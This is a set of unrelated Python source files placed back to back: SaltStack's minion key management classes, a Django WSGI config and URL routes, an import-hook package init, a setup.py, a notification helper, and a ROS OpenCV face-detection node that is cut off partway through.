            preserve_minions = []
        m_cache = os.path.join(self.opts['cachedir'], self.ACC)
        if not os.path.isdir(m_cache):
            return
        keys = self.list_keys()
        minions = []
        for key, val in six.iteritems(keys):
            minions.extend(val)
        if not self.opts.get('preserve_minion_cache', False) or not preserve_minions:
            for minion in os.listdir(m_cache):
                if minion not in minions and minion not in preserve_minions:
                    shutil.rmtree(os.path.join(m_cache, minion))

    def check_master(self):
        '''
        Log if the master is not running

        :rtype: bool
        :return: Whether or not the master is running
        '''
        if not os.path.exists(
                os.path.join(
                    self.opts['sock_dir'],
                    'publish_pull.ipc'
                    )
                ):
            return False
        return True

    def name_match(self, match, full=False):
        '''
        Accept a glob which to match the of a key and return the key's location
        '''
        if full:
            matches = self.all_keys()
        else:
            matches = self.list_keys()
        ret = {}
        if ',' in match and isinstance(match, str):
            match = match.split(',')
        for status, keys in six.iteritems(matches):
            for key in salt.utils.isorted(keys):
                if isinstance(match, list):
                    for match_item in match:
                        if fnmatch.fnmatch(key, match_item):
                            if status not in ret:
                                ret[status] = []
                            ret[status].append(key)
                else:
                    if fnmatch.fnmatch(key, match):
                        if status not in ret:
                            ret[status] = []
                        ret[status].append(key)
        return ret

    def dict_match(self, match_dict):
        '''
        Accept a dictionary of keys and return the current state of the
        specified keys
        '''
        ret = {}
        cur_keys = self.list_keys()
        for status, keys in six.iteritems(match_dict):
            for key in salt.utils.isorted(keys):
                for keydir in (self.ACC, self.PEND, self.REJ, self.DEN):
                    if keydir and fnmatch.filter(cur_keys.get(keydir, []), key):
                        ret.setdefault(keydir, []).append(key)
        return ret

    def local_keys(self):
        '''
        Return a dict of local keys
        '''
        ret = {'local': []}
        for fn_ in salt.utils.isorted(os.listdir(self.opts['pki_dir'])):
            if fn_.endswith('.pub') or fn_.endswith('.pem'):
                path = os.path.join(self.opts['pki_dir'], fn_)
                if os.path.isfile(path):
                    ret['local'].append(fn_)
        return ret

    def list_keys(self):
        '''
        Return a dict of managed keys and what the key status are
        '''

        key_dirs = []

        # We have to differentiate between RaetKey._check_minions_directories
        # and Zeromq-Keys. Raet-Keys only have three states while ZeroMQ-keys
        # havd an additional 'denied' state.
        if self.opts['transport'] in ('zeromq', 'tcp'):
            key_dirs = self._check_minions_directories()
        else:
            key_dirs = self._check_minions_directories()

        ret = {}

        for dir_ in key_dirs:
            ret[os.path.basename(dir_)] = []
            try:
                for fn_ in salt.utils.isorted(os.listdir(dir_)):
                    if not fn_.startswith('.'):
                        if os.path.isfile(os.path.join(dir_, fn_)):
                            ret[os.path.basename(dir_)].append(fn_)
            except (OSError, IOError):
                # key dir kind is not created yet, just skip
                continue
        return ret

    def all_keys(self):
        '''
        Merge managed keys with local keys
        '''
        keys = self.list_keys()
        keys.update(self.local_keys())
        return keys

    def list_status(self, match):
        '''
        Return a dict of managed keys under a named status
        '''
        acc, pre, rej, den = self._check_minions_directories()
        ret = {}
        if match.startswith('acc'):
            ret[os.path.basename(acc)] = []
            for fn_ in salt.utils.isorted(os.listdir(acc)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(acc, fn_)):
                        ret[os.path.basename(acc)].append(fn_)
        elif match.startswith('pre') or match.startswith('un'):
            ret[os.path.basename(pre)] = []
            for fn_ in salt.utils.isorted(os.listdir(pre)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(pre, fn_)):
                        ret[os.path.basename(pre)].append(fn_)
        elif match.startswith('rej'):
            ret[os.path.basename(rej)] = []
            for fn_ in salt.utils.isorted(os.listdir(rej)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(rej, fn_)):
                        ret[os.path.basename(rej)].append(fn_)
        elif match.startswith('den'):
            ret[os.path.basename(den)] = []
            for fn_ in salt.utils.isorted(os.listdir(den)):
                if not fn_.startswith('.'):
                    if os.path.isfile(os.path.join(den, fn_)):
                        ret[os.path.basename(den)].append(fn_)
        elif match.startswith('all'):
            return self.all_keys()
        return ret

    def key_str(self, match):
        '''
        Return the specified public key or keys based on a glob
        '''
        ret = {}
        for status, keys in six.iteritems(self.name_match(match)):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                path = os.path.join(self.opts['pki_dir'], status, key)
                with salt.utils.fopen(path, 'r') as fp_:
                    ret[status][key] = fp_.read()
        return ret

    def key_str_all(self):
        '''
        Return all managed key strings
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                path = os.path.join(self.opts['pki_dir'], status, key)
                with salt.utils.fopen(path, 'r') as fp_:
                    ret[status][key] = fp_.read()
        return ret

    def accept(self, match=None, match_dict=None, include_rejected=False):
        '''
        Accept public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_rejected:
            keydirs.append(self.REJ)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.ACC,
                                key)
                            )
                    eload = {'result': True,
                             'act': 'accept',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (IOError, OSError):
                    pass
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def accept_all(self):
        '''
        Accept all keys in pre
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.ACC,
                            key)
                        )
                eload = {'result': True,
                         'act': 'accept',
                         'id': key}
                self.event.fire_event(eload, tagify(prefix='key'))
            except (IOError, OSError):
                pass
        return self.list_keys()

    def delete_key(self, match=None, match_dict=None, preserve_minions=False):
        '''
        Delete public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".

        To preserve the master caches of minions who are matched, set preserve_minions
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        for status, keys in six.iteritems(matches):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                    eload = {'result': True,
                             'act': 'delete',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (OSError, IOError):
                    pass
        self.check_minion_cache(preserve_minions=matches.get('minions', []))
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def delete_all(self):
        '''
        Delete all keys
        '''
        for status, keys in six.iteritems(self.list_keys()):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                    eload = {'result': True,
                             'act': 'delete',
                             'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (OSError, IOError):
                    pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return self.list_keys()

    def reject(self, match=None, match_dict=None, include_accepted=False):
        '''
        Reject public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_accepted:
            keydirs.append(self.ACC)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.REJ,
                                key)
                            )
                    eload = {'result': True,
                            'act': 'reject',
                            'id': key}
                    self.event.fire_event(eload, tagify(prefix='key'))
                except (IOError, OSError):
                    pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def reject_all(self):
        '''
        Reject all keys in pre
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.REJ,
                            key)
                        )
                eload = {'result': True,
                         'act': 'reject',
                         'id': key}
                self.event.fire_event(eload, tagify(prefix='key'))
            except (IOError, OSError):
                pass
        self.check_minion_cache()
        if self.opts.get('rotate_aes_key'):
            salt.crypt.dropfile(self.opts['cachedir'], self.opts['user'])
        return self.list_keys()

    def finger(self, match):
        '''
        Return the fingerprint for a specified key
        '''
        matches = self.name_match(match, True)
        ret = {}
        for status, keys in six.iteritems(matches):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = salt.utils.pem_finger(path, sum_type=self.opts['hash_type'])
        return ret

    def finger_all(self):
        '''
        Return fingerprins for all keys
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = salt.utils.pem_finger(path, sum_type=self.opts['hash_type'])
        return ret


class RaetKey(Key):
    '''
    Manage keys from the raet backend
    '''
    ACC = 'accepted'
    PEND = 'pending'
    REJ = 'rejected'
    DEN = None

    def __init__(self, opts):
        Key.__init__(self, opts)
        self.auto_key = salt.daemons.masterapi.AutoKey(self.opts)
        self.serial = salt.payload.Serial(self.opts)

    def _check_minions_directories(self):
        '''
        Return the minion keys directory paths
        '''
        accepted = os.path.join(self.opts['pki_dir'], self.ACC)
        pre = os.path.join(self.opts['pki_dir'], self.PEND)
        rejected = os.path.join(self.opts['pki_dir'], self.REJ)
        return accepted, pre, rejected

    def check_minion_cache(self, preserve_minions=False):
        '''
        Check the minion cache to make sure that old minion data is cleared
        '''
        keys = self.list_keys()
        minions = []
        for key, val in six.iteritems(keys):
            minions.extend(val)

        m_cache = os.path.join(self.opts['cachedir'], 'minions')
        if os.path.isdir(m_cache):
            for minion in os.listdir(m_cache):
                if minion not in minions:
                    shutil.rmtree(os.path.join(m_cache, minion))

        kind = self.opts.get('__role', '')  # application kind
        if kind not in kinds.APPL_KINDS:
            emsg = ("Invalid application kind = '{0}'.".format(kind))
            log.error(emsg + '\n')
            raise ValueError(emsg)
        role = self.opts.get('id', '')
        if not role:
            emsg = ("Invalid id.")
            log.error(emsg + "\n")
            raise ValueError(emsg)

        name = "{0}_{1}".format(role, kind)
        road_cache = os.path.join(self.opts['cachedir'],
                                  'raet',
                                  name,
                                  'remote')
        if os.path.isdir(road_cache):
            for road in os.listdir(road_cache):
                root, ext = os.path.splitext(road)
                if ext not in ['.json', '.msgpack']:
                    continue
                prefix, sep, name = root.partition('.')
                if not name or prefix != 'estate':
                    continue
                path = os.path.join(road_cache, road)
                with salt.utils.fopen(path, 'rb') as fp_:
                    if ext == '.json':
                        data = json.load(fp_)
                    elif ext == '.msgpack':
                        data = msgpack.load(fp_)
                    if data['role'] not in minions:
                        os.remove(path)

    def gen_keys(self):
        '''
        Use libnacl to generate and safely save a private key
        '''
        import libnacl.public
        d_key = libnacl.dual.DualSecret()
        path = '{0}.key'.format(os.path.join(
            self.opts['gen_keys_dir'],
            self.opts['gen_keys']))
        d_key.save(path, 'msgpack')

    def check_master(self):
        '''
        Log if the master is not running
        NOT YET IMPLEMENTED
        '''
        return True

    def local_keys(self):
        '''
        Return a dict of local keys
        '''
        ret = {'local': []}
        fn_ = os.path.join(self.opts['pki_dir'], 'local.key')
        if os.path.isfile(fn_):
            ret['local'].append(fn_)
        return ret

    def status(self, minion_id, pub, verify):
        '''
        Accepts the minion id, device id, curve public and verify keys.
        If the key is not present, put it in pending and return "pending",
        If the key has been accepted return "accepted"
        if the key should be rejected, return "rejected"
        '''
        acc, pre, rej = self._check_minions_directories()  # pylint: disable=W0632
        acc_path = os.path.join(acc, minion_id)
        pre_path = os.path.join(pre, minion_id)
        rej_path = os.path.join(rej, minion_id)
        # open mode is turned on, force accept the key
        keydata = {
                'minion_id': minion_id,
                'pub': pub,
                'verify': verify}
        if self.opts['open_mode']:  # always accept and overwrite
            with salt.utils.fopen(acc_path, 'w+b') as fp_:
                fp_.write(self.serial.dumps(keydata))
                return self.ACC
        if os.path.isfile(rej_path):
            log.debug("Rejection Reason: Keys already rejected.\n")
            return self.REJ
        elif os.path.isfile(acc_path):
            # The minion id has been accepted, verify the key strings
            with salt.utils.fopen(acc_path, 'rb') as fp_:
                keydata = self.serial.loads(fp_.read())
            if keydata['pub'] == pub and keydata['verify'] == verify:
                return self.ACC
            else:
                log.debug("Rejection Reason: Keys not match prior accepted.\n")
                return self.REJ
        elif os.path.isfile(pre_path):
            auto_reject = self.auto_key.check_autoreject(minion_id)
            auto_sign = self.auto_key.check_autosign(minion_id)
            with salt.utils.fopen(pre_path, 'rb') as fp_:
                keydata = self.serial.loads(fp_.read())
            if keydata['pub'] == pub and keydata['verify'] == verify:
                if auto_reject:
                    self.reject(minion_id)
                    log.debug("Rejection Reason: Auto reject pended.\n")
                    return self.REJ
                elif auto_sign:
                    self.accept(minion_id)
                    return self.ACC
                return self.PEND
            else:
                log.debug("Rejection Reason: Keys not match prior pended.\n")
                return self.REJ
        # This is a new key, evaluate auto accept/reject files and place
        # accordingly
        auto_reject = self.auto_key.check_autoreject(minion_id)
        auto_sign = self.auto_key.check_autosign(minion_id)
        if self.opts['auto_accept']:
            w_path = acc_path
            ret = self.ACC
        elif auto_sign:
            w_path = acc_path
            ret = self.ACC
        elif auto_reject:
            w_path = rej_path
            log.debug("Rejection Reason: Auto reject new.\n")
            ret = self.REJ
        else:
            w_path = pre_path
            ret = self.PEND
        with salt.utils.fopen(w_path, 'w+b') as fp_:
            fp_.write(self.serial.dumps(keydata))
            return ret

    def _get_key_str(self, minion_id, status):
        '''
        Return the key string in the form of:

        pub: <pub>
        verify: <verify>
        '''
        path = os.path.join(self.opts['pki_dir'], status, minion_id)
        with salt.utils.fopen(path, 'r') as fp_:
            keydata = self.serial.loads(fp_.read())
            return 'pub: {0}\nverify: {1}'.format(
                    keydata['pub'],
                    keydata['verify'])

    def _get_key_finger(self, path):
        '''
        Return a sha256 kingerprint for the key
        '''
        with salt.utils.fopen(path, 'r') as fp_:
            keydata = self.serial.loads(fp_.read())
            key = 'pub: {0}\nverify: {1}'.format(
                    keydata['pub'],
                    keydata['verify'])
        return hashlib.sha256(key).hexdigest()

    def key_str(self, match):
        '''
        Return the specified public key or keys based on a glob
        '''
        ret = {}
        for status, keys in six.iteritems(self.name_match(match)):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                ret[status][key] = self._get_key_str(key, status)
        return ret

    def key_str_all(self):
        '''
        Return all managed key strings
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in salt.utils.isorted(keys):
                ret[status][key] = self._get_key_str(key, status)
        return ret

    def accept(self, match=None, match_dict=None, include_rejected=False):
        '''
        Accept public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_rejected:
            keydirs.append(self.REJ)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.ACC,
                                key)
                            )
                except (IOError, OSError):
                    pass
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def accept_all(self):
        '''
        Accept all keys in pre
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.ACC,
                            key)
                        )
            except (IOError, OSError):
                pass
        return self.list_keys()

    def delete_key(self, match=None, match_dict=None, preserve_minions=False):
        '''
        Delete public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        for status, keys in six.iteritems(matches):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                except (OSError, IOError):
                    pass
        self.check_minion_cache(preserve_minions=matches.get('minions', []))
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def delete_all(self):
        '''
        Delete all keys
        '''
        for status, keys in six.iteritems(self.list_keys()):
            for key in keys:
                try:
                    os.remove(os.path.join(self.opts['pki_dir'], status, key))
                except (OSError, IOError):
                    pass
        self.check_minion_cache()
        return self.list_keys()

    def reject(self, match=None, match_dict=None, include_accepted=False):
        '''
        Reject public keys. If "match" is passed, it is evaluated as a glob.
        Pre-gathered matches can also be passed via "match_dict".
        '''
        if match is not None:
            matches = self.name_match(match)
        elif match_dict is not None and isinstance(match_dict, dict):
            matches = match_dict
        else:
            matches = {}
        keydirs = [self.PEND]
        if include_accepted:
            keydirs.append(self.ACC)
        for keydir in keydirs:
            for key in matches.get(keydir, []):
                try:
                    shutil.move(
                            os.path.join(
                                self.opts['pki_dir'],
                                keydir,
                                key),
                            os.path.join(
                                self.opts['pki_dir'],
                                self.REJ,
                                key)
                            )
                except (IOError, OSError):
                    pass
        self.check_minion_cache()
        return (
            self.name_match(match) if match is not None
            else self.dict_match(matches)
        )

    def reject_all(self):
        '''
        Reject all keys in pre
        '''
        keys = self.list_keys()
        for key in keys[self.PEND]:
            try:
                shutil.move(
                        os.path.join(
                            self.opts['pki_dir'],
                            self.PEND,
                            key),
                        os.path.join(
                            self.opts['pki_dir'],
                            self.REJ,
                            key)
                        )
            except (IOError, OSError):
                pass
        self.check_minion_cache()
        return self.list_keys()

    def finger(self, match):
        '''
        Return the fingerprint for a specified key
        '''
        matches = self.name_match(match, True)
        ret = {}
        for status, keys in six.iteritems(matches):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = self._get_key_finger(path)
        return ret

    def finger_all(self):
        '''
        Return fingerprints for all keys
        '''
        ret = {}
        for status, keys in six.iteritems(self.list_keys()):
            ret[status] = {}
            for key in keys:
                if status == 'local':
                    path = os.path.join(self.opts['pki_dir'], key)
                else:
                    path = os.path.join(self.opts['pki_dir'], status, key)
                ret[status][key] = self._get_key_finger(path)
        return ret

    def read_all_remote(self):
        '''
        Return a dict of all remote key data
        '''
        data = {}
        for status, mids in six.iteritems(self.list_keys()):
            for mid in mids:
                keydata = self.read_remote(mid, status)
                if keydata:
                    keydata['acceptance'] = status
                    data[mid] = keydata

        return data

    def read_remote(self, minion_id, status=ACC):
        '''
        Read in a remote key of status
        '''
        path = os.path.join(self.opts['pki_dir'], status, minion_id)
        if not os.path.isfile(path):
            return {}
        with salt.utils.fopen(path, 'rb') as fp_:
            return self.serial.loads(fp_.read())

    def read_local(self):
        '''
        Read in the local private keys, return an empy dict if the keys do not
        exist
        '''
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        if not os.path.isfile(path):
            return {}
        with salt.utils.fopen(path, 'rb') as fp_:
            return self.serial.loads(fp_.read())

    def write_local(self, priv, sign):
        '''
        Write the private key and the signing key to a file on disk
        '''
        keydata = {'priv': priv,
                   'sign': sign}
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        c_umask = os.umask(191)
        if os.path.exists(path):
            #mode = os.stat(path).st_mode
            os.chmod(path, stat.S_IWUSR | stat.S_IRUSR)
        with salt.utils.fopen(path, 'w+') as fp_:
            fp_.write(self.serial.dumps(keydata))
            os.chmod(path, stat.S_IRUSR)
        os.umask(c_umask)

    def delete_local(self):
        '''
        Delete the local private key file
        '''
        path = os.path.join(self.opts['pki_dir'], 'local.key')
        if os.path.isfile(path):
            os.remove(path)

    def delete_pki_dir(self):
        '''
        Delete the private key directory
        '''
        path = self.opts['pki_dir']
        if os.path.exists(path):
            shutil.rmtree(path)

"""
WSGI config for brp project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""

import os

from dj_static import Cling
from django.core.wsgi import get_wsgi_application

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "brp.settings")
os.environ.setdefault('DJANGO_CONFIGURATION', 'Dev')

application = Cling(get_wsgi_application())

"""
recursely
"""
__version__ = "0.1"
__description__ = "Recursive importer for Python submodules"
__author__ = "Karol Kuczmarski"
__license__ = "Simplified BSD"


import sys

from recursely._compat import IS_PY3
from recursely.importer import RecursiveImporter
from recursely.utils import SentinelList


__all__ = ['install']


def install(retroactive=True):
    """Install the recursive import hook in ``sys.meta_path``,
    enabling the use of ``__recursive__`` directive.

    :param retroactive: Whether the hook should be retroactively applied
                        to module's that have been imported before
                        it was installed.
    """
    if RecursiveImporter.is_installed():
        return

    importer = RecursiveImporter()

    # because the hook is a catch-all one, we ensure that it's always
    # at the very end of ``sys.meta_path``, so that it's tried only if
    # no other (more specific) hook has been chosen by Python
    if IS_PY3:
        for i in reversed(range(len(sys.meta_path))):
            ih_module = getattr(sys.meta_path[i], '__module__', '')
            is_builtin = ih_module == '_frozen_importlib'
            if not is_builtin:
                break
        sys.meta_path = SentinelList(
            sys.meta_path[:i],
            sentinels=[importer] + sys.meta_path[i:])
    else:
        sys.meta_path = SentinelList(sys.meta_path, sentinel=importer)

    # look through already imported packages and recursively import
    # their submodules, if they contain the ``__recursive__`` directive
    if retroactive:
        for module in list(sys.modules.values()):
            importer.recurse(module)

# coding: utf-8

import sys
from setuptools import setup, find_packages

NAME = "pollster"
VERSION = "2.0.2"

# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools

REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil", "pandas >= 0.19.1"]

setup(
    name=NAME,
    version=VERSION,
    description="Pollster API",
    author_email="Adam Hooper <adam.hooper@huffingtonpost.com>",
    url="https://github.com/huffpostdata/python-pollster",
    keywords=["Pollster API"],
    install_requires=REQUIRES,
    packages=find_packages(),
    include_package_data=True,
    long_description="""Download election-related polling data from Pollster."""
)


import requests
import logging
import redis
from requests.packages.urllib3.exceptions import ConnectionError
from core.serialisers import json
from dss import localsettings
# TODO(fergal.moran@gmail.com): refactor these out to
# classes to avoid duplicating constants below
HEADERS = {
    'content-type': 'application/json'
}

logger = logging.getLogger('spa')


def post_notification(session_id, image, message):
    try:
        payload = {
            'sessionid': session_id,
            'image': image,
            'message': message
        }
        data = json.dumps(payload)
        r = requests.post(
            localsettings.REALTIME_HOST + 'notification',
            data=data,
            headers=HEADERS
        )
        if r.status_code == 200:
            return ""
        else:
            return r.text
    except ConnectionError:
        #should probably implement some sort of retry in here
        pass
# Copyright (c) 2021, DjaoDjin Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
#    this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
#    this list of conditions and the following disclaimer in the documentation
#    and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

__version__ = '0.6.4-dev'

# Copyright 2014 Dev in Cachu authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.

from django.conf import settings
from django.conf.urls import include, patterns, url
from django.views.decorators import csrf
from django.views.generic import base

from django.contrib import admin
admin.autodiscover()

from devincachu.destaques import views as dviews
from devincachu.inscricao import views as iviews
from devincachu.palestras import views as pviews

p = patterns
urlpatterns = p("",
                url(r"^admin/", include(admin.site.urls)),
                url(r"^palestrantes/$",
                    pviews.PalestrantesView.as_view(),
                    name="palestrantes"),
                url(r"^programacao/$",
                    pviews.ProgramacaoView.as_view(),
                    name="programacao"),
                url(r"^programacao/(?P<palestrantes>.*)/(?P<slug>[\w-]+)/$",
                    pviews.PalestraView.as_view(),
                    name="palestra"),
                url(r"^inscricao/$",
                    iviews.Inscricao.as_view(),
                    name="inscricao"),
                url(r"^notificacao/$",
                    csrf.csrf_exempt(iviews.Notificacao.as_view()),
                    name="notificacao"),
                url(r"^certificado/validar/$",
                    iviews.ValidacaoCertificado.as_view(),
                    name="validacao_certificado"),
                url(r"^certificado/$",
                    iviews.BuscarCertificado.as_view(),
                    name="busca_certificado"),
                url(r"^certificado/(?P<slug>[0-9a-f]+)/$",
                    iviews.Certificado.as_view(),
                    name="certificado"),
                url(r"^sobre/$",
                    base.TemplateView.as_view(
                        template_name="sobre.html",
                    ),
                    name="sobre-o-evento"),
                url(r"^quando-e-onde/$",
                    base.TemplateView.as_view(
                        template_name="quando-e-onde.html",
                    ),
                    name="quando-e-onde"),
                url(r"^$", dviews.IndexView.as_view(), name="index"),
                )

if settings.DEBUG:
    urlpatterns += patterns("",
                            url(r"^media/(?P<path>.*)$",
                                "django.views.static.serve",
                                {"document_root": settings.MEDIA_ROOT}),
                            )

#!/usr/bin/env python
#*********************************************************************
# Software License Agreement (BSD License)
#
#  Copyright (c) 2011 andrewtron3000
#  All rights reserved.
#
#  Redistribution and use in source and binary forms, with or without
#  modification, are permitted provided that the following conditions
#  are met:
#
#   * Redistributions of source code must retain the above copyright
#     notice, this list of conditions and the following disclaimer.
#   * Redistributions in binary form must reproduce the above
#     copyright notice, this list of conditions and the following
#     disclaimer in the documentation and/or other materials provided
#     with the distribution.
#   * Neither the name of the Willow Garage nor the names of its
#     contributors may be used to endorse or promote products derived
#     from this software without specific prior written permission.
#
#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
#  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
#  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
#  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
#  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
#  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
#  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
#  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#  POSSIBILITY OF SUCH DAMAGE.
#********************************************************************/
import roslib; roslib.load_manifest('face_detection')
import rospy
import sys
import cv
from cv_bridge import CvBridge

from sensor_msgs.msg import Image
from geometry_msgs.msg import Point
from geometry_msgs.msg import PointStamped

#
#  Instantiate a new opencv to ROS bridge adaptor
#
cv_bridge = CvBridge()

#
# Define the callback that will be called when a new image is received.
#
def callback(publisher, coord_publisher, cascade, imagemsg):
    #
    #  Convert the ROS imagemsg to an opencv image.
    #
    image = cv_bridge.imgmsg_to_cv(imagemsg, 'mono8')

    #
    #  Blur the image.
    #
    cv.Smooth(image, image, cv.CV_GAUSSIAN)

    #
    #  Allocate some storage for the haar detect operation.
    #
    storage = cv.CreateMemStorage(0)

    #
    #  Call the face detector function.
    #
    faces = cv.HaarDetectObjects(image, cascade, storage, 1.2, 2, 
                                 cv.CV_HAAR_DO_CANNY_PRUNING, (100,100))
 
    #
    #  If faces are detected, compute the centroid of all the faces
    #  combined.
    #
    face_centroid_x = 0.0
    face_centroid_y = 0.0
    if len(faces) > 0:
        #
        #  For each face, draw a rectangle around it in the image,
        #  and also add the position of the face to the centroid
        #  of all faces combined.
        #
        for (i, n) in faces:
            x = int(i[0])
            y = int(i[1])
            width = int(i[2])
            height = int(i[3])
            cv.Rectangle(image, 
                         (x, y),
                         (x + width, y + height),
                         cv.CV_RGB(0,255,0), 3, 8, 0)
            face_centroid_x += float(x) + (float(width) / 2.0)
            face_centroid_y += float(y) + (float(height) / 2.0)
        #
